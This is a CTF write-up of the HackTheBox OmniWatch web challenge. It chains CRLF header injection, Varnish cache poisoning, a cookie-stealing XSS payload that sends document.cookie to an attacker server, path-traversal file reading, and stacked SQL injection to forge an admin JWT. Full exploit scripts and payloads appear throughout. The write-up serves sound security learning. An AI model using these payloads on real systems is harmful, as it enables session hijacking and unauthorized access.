HackTheBox Business CTF: Vault Of Hope—OmniWatch CTF Writeup

Welcome back to another writeup! In this one, I’ll walk you through how I solved OmniWatch, a Web Exploitation challenge from the HackTheBox Business CTF: Vault of Hope. This wasn’t your typical web challenge, it was marked as hard, and it definitely lived up to the rating. From bypasses to digging deep into how the web app functioned, this box threw several curveballs that required a mix of creativity, persistence, and solid understanding of web internals. If you're into breaking the web (ethically, of course), sit tight, this is going to be an interesting ride. Let's dive in!!

Challenge Description

The crew has uncovered the IP address of a web interface used by the mercenary group called "Gunners" to track and spy on their enemies. To locate an elusive black market dealer for a critical trade, the team must hack into this gunners network and retrieve the last known location of a caravan that was recently ambushed in the wasteland. This caravan's trail holds the key to finding the infamous black market seller, making the mission a high-stakes race against time to outwit the gunners and secure the vital information needed.

import time, schedule, threading

from application.app import app
from application.util.bot import run_scheduled_bot

def run_flask_app():
    app.run(host="0.0.0.0", port=3000, threaded=True, debug=False)


if __name__ == "__main__":
    schedule.every(0.5).minutes.do(run_scheduled_bot, app.config)

    flask_thread = threading.Thread(target=run_flask_app)
    flask_thread.start()

    while True:
        schedule.run_pending()
        time.sleep(1)

A Flask web application and a scheduled task are both launched using threads. The Flask server listens on port 3000, while a function (run_scheduled_bot) is set to execute every 30 seconds. To allow them to run simultaneously, the Flask app is executed in its own thread. Meanwhile, the main thread continuously monitors and triggers scheduled tasks, pausing for 1 second between each cycle.

Now let's check the bot.py

import time, random

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options

from application.util.database import MysqlInterface

def run_scheduled_bot(config):
        try:
                bot_runner(config)
        except Exception:
                mysql_interface = MysqlInterface(config)
                mysql_interface.update_bot_status("not_running")


def bot_runner(config):
        mysql_interface = MysqlInterface(config)
        mysql_interface.update_bot_status("running")

        chrome_options = Options()

        chrome_options.add_argument("headless")
        chrome_options.add_argument("no-sandbox")
        chrome_options.add_argument("ignore-certificate-errors")
        chrome_options.add_argument("disable-dev-shm-usage")
        chrome_options.add_argument("disable-infobars")
        chrome_options.add_argument("disable-background-networking")
        chrome_options.add_argument("disable-default-apps")
        chrome_options.add_argument("disable-extensions")
        chrome_options.add_argument("disable-gpu")
        chrome_options.add_argument("disable-sync")
        chrome_options.add_argument("disable-translate")
        chrome_options.add_argument("hide-scrollbars")
        chrome_options.add_argument("metrics-recording-only")
        chrome_options.add_argument("no-first-run")
        chrome_options.add_argument("safebrowsing-disable-auto-update")
        chrome_options.add_argument("media-cache-size=1")
        chrome_options.add_argument("disk-cache-size=1")

        client = webdriver.Chrome(options=chrome_options)

        client.get("http://127.0.0.1:1337/controller/login")

        time.sleep(3)
        client.find_element(By.ID, "username").send_keys(config["MODERATOR_USER"])
        client.find_element(By.ID, "password").send_keys(config["MODERATOR_PASSWORD"])
        client.execute_script("document.getElementById('login-btn').click()")
        time.sleep(3)

        client.get(f"http://127.0.0.1:1337/oracle/json/{str(random.randint(1, 15))}")

        time.sleep(10)

        mysql_interface.update_bot_status("not_running")
        client.quit()

This script defines a scheduled bot function that uses Selenium WebDriver with headless Chrome to automate browser interactions on a local web application. The bot logs in to a controller panel at http://127.0.0.1:1337/controller/login using credentials from a config file, waits, and then navigates to a random URL in the format http://127.0.0.1:1337/oracle/json/{1–15}. Throughout the process, it updates its running status in a MySQL database using a custom MysqlInterface class. Chrome is heavily sandboxed and stripped of features using various flags to optimize for headless and secure execution. If any error occurs during the run, the bot safely resets its status in the database to "not_running".

How about the config.py

import os
from dotenv import load_dotenv

load_dotenv()

class Config(object):
        JWT_KEY = open("/app/jwt_secret.txt", "r").read()
        MYSQL_HOST = os.getenv("MYSQL_HOST")
        MYSQL_DATABASE = os.getenv("MYSQL_DATABASE")
        MYSQL_USER = os.getenv("MYSQL_USER")
        MYSQL_PASSWORD = os.getenv("MYSQL_PASSWORD")
        MODERATOR_USER = os.getenv("MODERATOR_USER")
        MODERATOR_PASSWORD = os.getenv("MODERATOR_PASSWORD")


class ProductionConfig(Config):
        pass


class DevelopmentConfig(Config):
        DEBUG = False


class TestingConfig(Config):
        TESTING = False

This code defines configuration settings for an application using environment variables and a secret key file. It starts by loading environment variables from a .env file using load_dotenv(). The Config class serves as the base configuration, reading the JWT secret key from a file (/app/jwt_secret.txt) and fetching MySQL credentials and moderator login details from environment variables. Three subclasses—ProductionConfig, DevelopmentConfig, and TestingConfig—inherit from Config, with DevelopmentConfig and TestingConfig each overriding or specifying their own debug-related flags. This structure allows the application to switch between different runtime environments with minimal changes.

Now let's check the endpoints routes.py

import sys, datetime, os
from flask import Blueprint, current_app, render_template, make_response, request, redirect

from application.util.general import response
from application.util.jwt import create_jwt, verify_jwt
from application.util.database import MysqlInterface

web = Blueprint("web", __name__)

def moderator_middleware(func):
        def check_moderator(*args, **kwargs):
                jwt_cookie = request.cookies.get("jwt")
                if not jwt_cookie:
                        return redirect("/controller/login")

                token = verify_jwt(jwt_cookie, current_app.config["JWT_KEY"])
                if not token:
                        return redirect("/controller/login")

                mysql_interface = MysqlInterface(current_app.config)

                user_id = token.get("user_id")
                account_type = token.get("account_type")
                signature = jwt_cookie.split(".")[-1]
                saved_signature = mysql_interface.fetch_signature(user_id)

                if not user_id or not account_type or not signature or not saved_signature or signature == "":
                        return redirect("/controller/login")

                if saved_signature != signature:
                        mysql_interface.delete_signature(user_id)
                        return redirect("/controller/login")

                if not account_type or account_type not in ["moderator", "administrator"]:
                        return redirect("/controller/login")

                request.user_data = token
                return func(*args, **kwargs)

        check_moderator.__name__ = func.__name__
        return check_moderator


def administrator_middleware(func):
        def check_moderator(*args, **kwargs):
                jwt_cookie = request.cookies.get("jwt")
                if not jwt_cookie:
                        return redirect("/controller/login")

                token = verify_jwt(jwt_cookie, current_app.config["JWT_KEY"])
                if not token:
                        return redirect("/controller/login")

                mysql_interface = MysqlInterface(current_app.config)

                user_id = token.get("user_id")
                account_type = token.get("account_type")
                signature = jwt_cookie.split(".")[-1]
                saved_signature = mysql_interface.fetch_signature(user_id)

                if not user_id or not account_type or not signature or not saved_signature or signature == "":
                        return redirect("/controller/login")

                if saved_signature != signature:
                        mysql_interface.delete_signature(user_id)
                        return redirect("/controller/login")

                if account_type != "administrator":
                        return redirect("/controller/home")

                request.user_data = token
                return func(*args, **kwargs)

        check_moderator.__name__ = func.__name__
        return check_moderator


@web.route("/", methods=["GET"])
def index():
        return redirect("/controller/home")


@web.route("/bot_running", methods=["GET"])
def bot_running():
        mysql_interface = MysqlInterface(current_app.config)
        bot_status = mysql_interface.fetch_bot_status()
        return bot_status


@web.route("/login", methods=["GET", "POST"])
def login():
        if request.method == "GET":
                return render_template("login.html", title="OmniWatch - Log-in")

        if request.method == "POST":
                username = request.form.get("username")
                password = request.form.get("password")

                if not username or not password:
                        return response("Missing parameters"), 400

                mysql_interface = MysqlInterface(current_app.config)
                user_valid = mysql_interface.check_user(username, password)

                if not user_valid:
                        return response("Invalid user or password"), 401

                user = mysql_interface.fetch_user_by_username(username)

                jwt_payload = {
                        "user_id": user["user_id"],
                        "username": username,
                        "account_type": user["permissions"]
                }

                jwt = create_jwt(jwt_payload, current_app.config["JWT_KEY"])
                mysql_interface.create_or_update_signature(user["user_id"], jwt.split(".")[-1])

                expiration_time = datetime.datetime.now() + datetime.timedelta(minutes=60)
                resp = make_response(redirect("/controller/home"))
                resp.set_cookie("jwt", jwt, expires=expiration_time)
                return resp, 302


@web.route("/logout", methods=["GET"])
@moderator_middleware
def logout():
        mysql_interface = MysqlInterface(current_app.config)
        mysql_interface.delete_signature(request.user_data.get("user_id"))
        resp = make_response(redirect("/controller/login"))
        resp.set_cookie("jwt", "", expires=0)
        return resp, 302


@web.route("/home", methods=["GET"])
@moderator_middleware
def home():
        mysql_interface = MysqlInterface(current_app.config)
        devices = mysql_interface.fetch_all_devices()
        return render_template("home.html", user_data=request.user_data, nav_enabled=True, title="OmniWatch - Home", devices=devices)


@web.route("/device/<id>", methods=["GET"])
@moderator_middleware
def device(id):
        mysql_interface = MysqlInterface(current_app.config)
        device = mysql_interface.fetch_device(id)

        if not device:
                return redirect("/controller/home")

        return render_template("device.html", user_data=request.user_data, nav_enabled=True, title=f"OmniWatch - Device {device['device_id']}", device=device)


@web.route("/firmware", methods=["GET", "POST"])
@moderator_middleware
def firmware():
        if request.method == "GET":
                patches_avaliable = ["CyberSpecter_v1.5_config.json", "StealthPatch_v2.0_config.json"]
                return render_template("firmware.html", user_data=request.user_data, nav_enabled=True, title="OmniWatch - Firmware", patches=patches_avaliable)

        if request.method == "POST":
                patch = request.form.get("patch")

                if not patch:
                        return response("Missing parameters"), 400

                file_data = open(os.path.join(os.getcwd(), "application", "firmware", patch)).read()
                return file_data, 200


@web.route("/admin", methods=["GET"])
@administrator_middleware
def admin():
        flag = os.popen("/readflag").read()
        return render_template("admin.html", user_data=request.user_data, nav_enabled=True, title="OmniWatch - Admin", flag=flag)

A lot going on here, but I'll explain it per endpoints and middlewares!

Middleware: moderator_middleware

This function decorator ensures that only users with a valid jwt cookie and a role of either moderator or administrator can access protected routes. It validates the JWT, checks its signature against a stored one in the database to prevent session theft, and attaches user data to the request for later use. If any of these checks fail, the user is redirected to the login page.

Middleware: administrator_middleware

This is similar to the moderator middleware, but stricter. It only allows access if the user has the administrator role. If the JWT is invalid or the user is not an admin, they are either redirected to the login page or to /controller/home.

GET / → Redirect to Home

The root route (/) simply redirects users to /controller/home, serving as a default entry point to the controller panel.

GET /bot_running

This endpoint queries the bot’s current status from the database using MysqlInterface.fetch_bot_status() and returns it as plain text. It can be used to monitor whether the automated bot is currently running.

GET & POST /login

This handles both the login form display (GET) and login logic (POST). On POST, it verifies the username and password against the database. If valid, it generates a JWT, saves its signature for validation purposes, and sets it as a cookie. Users are then redirected to /controller/home.

GET /logout

Protected by moderator middleware, this logs the user out by deleting their saved JWT signature from the database and clearing the JWT cookie. The user is redirected to the login page.

GET /home

Also protected by moderator middleware, this is the main dashboard page. It fetches all IoT devices from the database and renders them on the home page, allowing moderators/admins to view them.

GET /device/<id>

This endpoint shows the detailed view of a specific device, based on the ID in the URL. If the device doesn't exist in the database, the user is redirected back to the home page. Only moderators and admins can access it.

GET & POST /firmware

This firmware manager page lists available firmware patches on GET. On POST, it takes the selected patch filename from the form and reads the corresponding file from disk, returning its content. This could be used to deploy or inspect firmware updates. Moderators and admins only.

GET /admin

This highly restricted admin-only page executes /readflag (likely a binary that outputs a secret/flag in CTF settings) and renders it in a web page. Only users with the administrator role and a valid JWT can access this endpoint.

TAKE NOTE OF THE ENDPOINTS

Now let's analyze the Zig service main.zig

const std = @import("std");
const httpz = @import("httpz");

const DefaultPrng = std.rand.DefaultPrng;
const Allocator = std.mem.Allocator;

var rand_impl = DefaultPrng.init(1);

pub fn main() !void {
    var gpa = std.heap.GeneralPurposeAllocator(.{}){};
    const allocator = gpa.allocator();
    const t1 = try std.Thread.spawn(.{}, start, .{allocator});
    t1.join();
}

pub fn start(allocator: Allocator) !void {
    var server = try httpz.Server().init(allocator, .{ .address = "0.0.0.0", .port = 4000 });
    defer server.deinit();
    var router = server.router();

    server.notFound(notFound);

    router.get("/oracle/:mode/:deviceId", oracle);
    try server.listen();
}

fn randomCoordinates() ![]const u8 {
    const strings = [_][]const u8{
        "37.8245", "-34.6037", "-122.4374", "-58.3816", "151.2093",
    };

    const randomIndex = @mod(rand_impl.random().int(u32), strings.len);
    const randomString = strings[randomIndex];
    return randomString;
}

fn oracle(req: *httpz.Request, res: *httpz.Response) !void {
    var gpa = std.heap.GeneralPurposeAllocator(.{}){};
    const allocator = gpa.allocator();

    const deviceId = req.param("deviceId").?;
    const mode = req.param("mode").?;
    const decodedDeviceId = try std.Uri.unescapeString(allocator, deviceId);
    const decodedMode = try std.Uri.unescapeString(allocator, mode);

    const latitude = try randomCoordinates();
    const longtitude = try randomCoordinates();

    res.header("X-Content-Type-Options", "nosniff");
    res.header("X-XSS-Protection", "1; mode=block");
    res.header("DeviceId", decodedDeviceId);

    if (std.mem.eql(u8, decodedMode, "json")) {
        try res.json(.{ .lat = latitude, .lon = longtitude }, .{});
    } else {
        const htmlTemplate =
            \\<!DOCTYPE html>
            \\<html>
            \\    <head>
            \\        <title>Device Oracle API v2.6</title>
            \\    </head>
            \\<body>
            \\    <p>Mode: {s}</p><p>Lat: {s}</p><p>Lon: {s}</p>
            \\</body>
            \\</html>
        ;

        res.body = try std.fmt.allocPrint(res.arena, htmlTemplate, .{ decodedMode, latitude, longtitude });
    }
}

fn notFound(_: *httpz.Request, res: *httpz.Response) !void {
    res.status = 404;
    res.body = "Not found";
}

This Zig program sets up a lightweight HTTP server using the httpz library, listening on port 4000. It defines a route /oracle/:mode/:deviceId that responds with either a JSON or HTML payload containing randomly selected latitude and longitude coordinates, depending on the mode URL parameter. The deviceId and mode values are URL-decoded before use, and the response includes security headers to prevent sniffing and XSS. The program also includes a custom 404 handler for unmatched routes. The server is launched in a separate thread using Zig's threading system, and a global random number generator is used to randomly select coordinates from a static list. This setup demonstrates a clean, concurrent, and dynamic web API written in Zig.

While researching, I came across a discussion highlighting a CRLF injection vulnerability in http.zig.

It turns out that all route parameters in the application are susceptible to CRLF (Carriage Return Line Feed) injection, allowing an attacker to inject arbitrary HTTP headers, such as the Content-Type header, which is crucial for exploiting cross-site scripting (XSS) vulnerabilities. Although this CRLF issue has been patched in newer versions of the http.zig library, it's evident that the target application is still using an outdated and static version of the library. This suggests that http.zig was included manually in the codebase rather than being managed through a proper package manager that would facilitate version updates. Furthermore, by inspecting the file signatures within the challenge/oracle/modules directory, we can confirm that they align with the pre-patch versions of http.zig, validating that the vulnerable code is indeed present and exploitable.

Let's validate if we can actually do some XSS

It's official! Now that we've confirmed the XSS vulnerability, what's the next step to exploit it?

Let's take a look at the cache.vcl

vcl 4.0;

backend default1 {
    .host = "127.0.0.1";
    .port = "3000";
}

backend default2 {
    .host = "127.0.0.1";
    .port = "4000";
}

sub vcl_hash {
    hash_data(req.http.CacheKey);
    return (lookup);
}

sub vcl_synth {
    if (resp.status == 301) {
        set resp.http.Location = req.http.Location;
        set resp.status = 301;
        return (deliver);
    }
}

sub vcl_recv {
    if (req.url ~ "^/controller/home"){
        set req.backend_hint = default1;
        if (req.http.Cookie) {
            return (hash);
        }
    } else if (req.url ~ "^/controller") {
        set req.backend_hint = default1;
    } else if (req.url ~ "^/oracle") {
        set req.backend_hint = default2;
    } else {
        set req.http.Location = "/controller";
        return (synth(301, "Moved"));
    }
}

sub vcl_backend_response {
    if (beresp.http.CacheKey == "enable") {
        set beresp.ttl = 10s;
        set beresp.http.Cache-Control = "public, max-age=10";
    } else {
        set beresp.ttl = 0s;
        set beresp.http.Cache-Control = "public, max-age=0";
    }
}

sub vcl_deliver {
    if (obj.hits > 0) {
        set resp.http.X-Cache = "HIT";
    } else {
        set resp.http.X-Cache = "MISS";
    }

    set resp.http.X-Cache-Hits = obj.hits;
}

I will keep it short, in this VCL configuration, vcl_hash is responsible for determining how the cache key is generated based on the request's CacheKey header, while vcl_backend_response defines the caching policy for the backend response. If the CacheKey equals "enable," the response is cached for 10 seconds, otherwise, it isn't cached. These two functions collaborate to control caching behavior, vcl_hash decides if the response should be cached, and vcl_backend_response controls the cache settings. The vcl_hash function uses the CacheKey header as the sole component to generate the cache key, and this could be abused to inject arbitrary headers, leading to potential cache poisoning attacks.

When we inject headers like Content-Type or X-Content-Type-Options together with the CacheKey = enabled header and an XSS payload in the mode parameter, Varnish caches the harmful response for 10 seconds. As a result, any subsequent user hitting the same endpoint will receive the compromised cached response. This issue arises because headers alone should not be considered for creating the cache key.

Race Condition via Chromium Bot

We attempted to exploit our findings by targeting the bot that runs every 30 seconds, but it didn't succeed.

When we attempt to poison the cache with the payload:

<script>fetch("http://my-server.com/exfiltrate?cookies="+document.cookie)</script>

We get a request without any cookies.

Why? Let's revisit the bot.py

client.get("http://127.0.0.1:1337/controller/login")

time.sleep(3)
client.find_element(By.ID, "username").send_keys(config["MODERATOR_USER"])
client.find_element(By.ID, "password").send_keys(config["MODERATOR_PASSWORD"])
client.execute_script("document.getElementById('login-btn').click()")
time.sleep(3)

client.get(f"http://127.0.0.1:1337/oracle/json/{str(random.randint(1, 15))}")

time.sleep(10)

mysql_interface.update_bot_status("not_running")
client.quit()

The bot starts by accessing the login page, pauses for 3 seconds, submits the login credentials, waits another 3 seconds, and then navigates to a randomly chosen device page within the oracle service. If we cache-poison the oracle endpoint before the login process, the bot hasn't received any cookies yet, so there's nothing to steal. Plus, if it gets served our cached malicious page early, it won't see the login form at all, causing the entire login attempt to break. To succeed, we need to time our cache poisoning precisely, right after the login completes, but before the bot hits the oracle endpoint.

I attempt to visit the bot_running endpoint

Because the /controller/bot_running endpoint reveals the bot’s current status, we can use it to roughly track its activity and aim to inject the cache-poisoning payload around 3 seconds after the bot begins running.

import time
import urllib.parse
import requests

TARGET_HOST = ""
TARGET_PORT = <PORT>
BASE_URL = f"http://{TARGET_HOST}:{TARGET_PORT}"

EXFIL_HOST = ""
EXFIL_PORT = <PORT>
EXFIL_ENDPOINT = f"http://{EXFIL_HOST}:{EXFIL_PORT}"

def encode_for_url(raw_str):
    """Encodes a string to be safely used in a URL."""
    return urllib.parse.quote(raw_str, safe="")

def is_bot_active():
    """Checks if the challenge bot is currently running."""
    response = requests.get(f"{BASE_URL}/controller/bot_running")
    is_running = response.text.strip() == "running"
    print(f"[*] Bot status check: {'ACTIVE' if is_running else 'INACTIVE'}")
    return is_running

def inject_xss_payload():
    """Attempts to inject an XSS payload into the cache if bot is running."""
    if not is_bot_active():
        print("[-] Bot is not active. Waiting for next attempt...")
        return False

    print("[+] Bot is active! Preparing to inject XSS payload after delay...")
    time.sleep(3)

    payload_script = f"<script>fetch('{EXFIL_ENDPOINT}/jwt/'+btoa(document.cookie))</script>"
    print(f"[+] XSS JavaScript Payload: {payload_script}")

    encoded_payload = encode_for_url(payload_script)
    print(f"[+] Encoded Payload: {encoded_payload}")

    malicious_headers = "\r\nCacheKey: enable\r\nX-Content-Type-Options: undefined"
    print("[+] Crafting injected headers:")
    print("    Raw:     " + malicious_headers.replace("\r\n", "\\r\\n"))
    encoded_headers = encode_for_url(malicious_headers)
    print("    Encoded: " + encoded_headers)

    target_url = f"{BASE_URL}/oracle/{encoded_payload}/1{encoded_headers}"
    print(f"[+] Sending request to: {target_url}")

    try:
        requests.get(target_url)
        print("[+] Cache poisoning attempt completed.")
    except Exception as e:
        print(f"[!] Error during injection: {e}")

def monitor_and_attack():
    """Continuously monitors and injects the cache when bot is active."""
    print("[*] Monitoring bot status. Waiting for window of opportunity...")
    while True:
        inject_xss_payload()
        time.sleep(1)

def entrypoint():
    """Script entrypoint."""
    monitor_and_attack()

if __name__ == "__main__":
    entrypoint()

This is the output

And my server received this

It worked!!! Now let's decode that base64 and it should give us the jwt token

Now let's add this JWT token

Reload and change the /login endpoint to /admin

We're now admin!!!

We now have admin, now what? You think the flag is here? Hell nah, XD!! We're not done yet.

Leak JWT secret via LFI

As you can see in the dashboard, we're admin right? But technically, we're NOT!

If we will decode the JWT token, this is the result

We are moderator, not the admin.

Since we are moderator, let's take a look at the features of the dashboard.

While exploring the dashboard, I headed over to the Firmware section, which brought up a firmware update interface. It displays two available firmware files that we can inspect or preview. Picking one shows the contents of the selected file.

Let's revisit the firmware function in routes.py

@web.route("/firmware", methods=["GET", "POST"])
@moderator_middleware
def firmware():
        if request.method == "GET":
                patches_avaliable = ["CyberSpecter_v1.5_config.json", "StealthPatch_v2.0_config.json"]
                return render_template("firmware.html", user_data=request.user_data, nav_enabled=True, title="OmniWatch - Firmware", patches=patches_avaliable)

        if request.method == "POST":
                patch = request.form.get("patch")

                if not patch:
                        return response("Missing parameters"), 400

                file_data = open(os.path.join(os.getcwd(), "application", "firmware", patch)).read()
                return file_data, 200

Examining the code, we observe that the file selected for preview is sent as a POST parameter from the frontend. The os.path.join function is used to construct the full file path. However, this approach is susceptible to Local File Inclusion (LFI), because if the second path argument is an absolute path, Python discards the first part and uses only the absolute one, allowing path manipulation.

What I've did is to fired up my BurpSuite to intercept the firmware

Noticed that the host changed because the server instance stopped and I have to repeat it again haha

Now if we go back to the config.py, you can see the full path of the jwt_secret.txt, changing the path in the patch parameter, it will give us content of jwt_secret.

MX'!J^rHl

SQL Injection to insert custom signature

We’ve successfully leaked the JWT secret. However, keep in mind that the authentication middleware includes tamper protection, so simply crafting a new JWT with the leaked secret won’t let us authenticate. The only viable bypass would be inserting a custom signature directly into the database.

Let's revisit the routes again

@web.route("/device/<id>", methods=["GET"])
@moderator_middleware
def device(id):
	mysql_interface = MysqlInterface(current_app.config)
	device = mysql_interface.fetch_device(id)
	
	if not device:
		return redirect("/controller/home")

	return render_template("device.html", user_data=request.user_data, nav_enabled=True, title=f"OmniWatch - Device {device['device_id']}", device=device)

At the /controller/device/<id> endpoint, a new MysqlInterface object is initialized, and its fetch_device method is invoked using the given id as the argument.

Let's take a look at the fetch_device function in database.py

def fetch_device(self, device_id):
    query = f"SELECT * FROM devices WHERE device_id = '{device_id}'"
    device = self.query(query, multi=True)[0][0]
    return device

By analyzing the database.py throughly, I confirmed that this is vulnerable to SQL Injection

def query(self, query, args=(), one=False, multi=False):
    cursor = self.connection.cursor()
    results = None

    if not multi:
        cursor.execute(query, args)
        rv = [dict((cursor.description[idx][0], value)
            for idx, value in enumerate(row)) for row in cursor.fetchall()]
        results = (rv[0] if rv else None) if one else rv
    else:
        results = []
        queries = query.split(";")
        for statement in queries:
            cursor.execute(statement, args)
            rv = [dict((cursor.description[idx][0], value)
                for idx, value in enumerate(row)) for row in cursor.fetchall()]
            results.append((rv[0] if rv else None) if one else rv)
            self.connection.commit()

    return results

The query method reveals that it's possible to perform a stacked query injection by including a semicolon (;) in the input payload.

Generating the JWT token and injecting a crafted signature into the database

Since we know the JWT secret, we can use it to create a JWT token as administrator.

import jwt

def create_admin_token(secret_key):
    user_data = dict(
        user_id=1,
        username="lean",
        account_type="administrator"
    )
    
    token = jwt.encode(user_data, key=secret_key, algorithm="HS256")
    return token

secret = "secret_key_here"
print(create_admin_token(secret))

This is the result

The signature is the last part of the token (As you can see the token is separated by dots.)

c8Vxd0zvvp66cdUGexZF64aXuRN_x7Wp4PL_Tm0-ihs

It's time to craft our SQL Injection Payload!

Payload

';UPDATE signatures SET signature = c8Vxd0zvvp66cdUGexZF64aXuRN_x7Wp4PL_Tm0-ihs WHERE user_id = 1#

The signature needs to be in hexadecimal format, and the SQL injection string has to be URL-encoded since it's being delivered through a URL parameter.

';UPDATE signatures SET signature = 0x6338567864307a76767036366364554765785a463634615875524e5f7837
577034504c5f546d302d696873 WHERE user_id = 1#

Now we will make it URL encoded.

%27%3BUPDATE%20signatures%20SET%20signature%20%3D%200x6338567864307a76767036366364554765785a463634615875524e5f7837577034504c5f546d302d696873%20WHERE%20user_id%20%3D%201%23

All we need to do is to send it via GET request and login with our new JWT token for admin.

Here's a Python script that will automate that

import requests
import re

# Target host and port
base_url = "http://<TARGET_HOST>:<TARGET_PORT>"

# Moderator JWT token (replace this with your actual moderator token)
moderator_jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6Ijk4MjRmOWMxNTQzNjI4YTg1YmI1MWQyZGQ2ZmNmOGEzIiwiYWNjb3VudF90eXBlIjoibW9kZXJhdG9yIn0.BKksNigs_z9erSl5ZN1PsQb5V7Or1UwsxkNQK76tt1c"

# Crafted admin JWT token (replace this with your actual admin token)
admin_jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImxlYW4iLCJhY2NvdW50X3R5cGUiOiJhZG1pbmlzdHJhdG9yIn0.c8Vxd0zvvp66cdUGexZF64aXuRN_x7Wp4PL_Tm0-ihs"

# Step 1: SQL Injection to insert the malicious JWT signature (modify based on your signature)
injection_payload = "/controller/device/%27%3BUPDATE%20signatures%20SET%20signature%20%3D%200x6338567864307a76767036366364554765785a463634615875524e5f7837577034504c5f546d302d696873%20WHERE%20user_id%20%3D%201%23"
mod_headers = {
    "Cookie": f"jwt={moderator_jwt}"
}

print("[*] Performing SQL injection to update admin JWT signature...")
inj_response = requests.get(base_url + injection_payload, headers=mod_headers)
print(f"[+] Injection request status: {inj_response.status_code}")

# Step 2: Access /controller/admin using crafted admin JWT
admin_headers = {
    "Cookie": f"jwt={admin_jwt}"
}

print("[*] Accessing /controller/admin...")
admin_response = requests.get(f"{base_url}/controller/admin", headers=admin_headers)

# Step 3: Search for flag in response
flag_match = re.search(r"HTB\{.*?\}", admin_response.text)

if flag_match:
    print(f"[+] Flag found: {flag_match.group(0)}")
else:
    print("[-] Flag not found or access was denied.")

Run and we should get the flag!

Bingo!

Now some of you maybe wondering why the status code is 500, it should be 200 right? But actually, 500 is a good sign that our exploit is working! Here's why:

  • It means that our injection reached the backend.

    • A syntax error, query failure, or logic bug triggered a server-side exception.

    • It proves that:

      • Our input was processed.

      • The server tried to execute our payload.

      • And something broke, which usually means we're close or successful.

  • Stacked query injections (like in our case):

    • We’re sending something like '; UPDATE ...; -- in a vulnerable parameter.

    • If the injection is syntactically correct but the backend isn’t expecting multiple queries (or gets confused during fetchall() after a non-SELECT), it often throws a 500.

    • In our specific situation, the backend runs cursor.fetchall() even after a non-SELECT (UPDATE) statement, which causes a list index out of range or similar — boom, 500.

Let me give you an example, try to look back at the fetch_device function, and analyze this part

device = self.query(query, multi=True)[0][0]

If query contains an UPDATE, fetchall() returns nothing, so:

  • results = []

  • results[0] → IndexError

  • = 500 Internal Server Error

And that exactly what you got if you will try to send the payload using curl

{"error":{"message":["list index out of range"],"type":"IndexError"}}

In offensive security, a 500 is a flag that your payload is doing something. It might not be perfect yet — but you’re definitely in.

Conclusion

Honestly, this challenge was quite tough—it demands chaining together several complex vulnerabilities to pull off the full exploit. From CRLF injection and cache poisoning to timing attacks and SQL injection, each step requires a deep understanding of how different components interact. It's not just about finding one bug but carefully combining them in the right order and with precise timing. Overall, it's a great exercise in real-world exploitation and a solid test of both patience and technical skill! HackTheBox is really tough, that's all I can say. Xd!

Last updated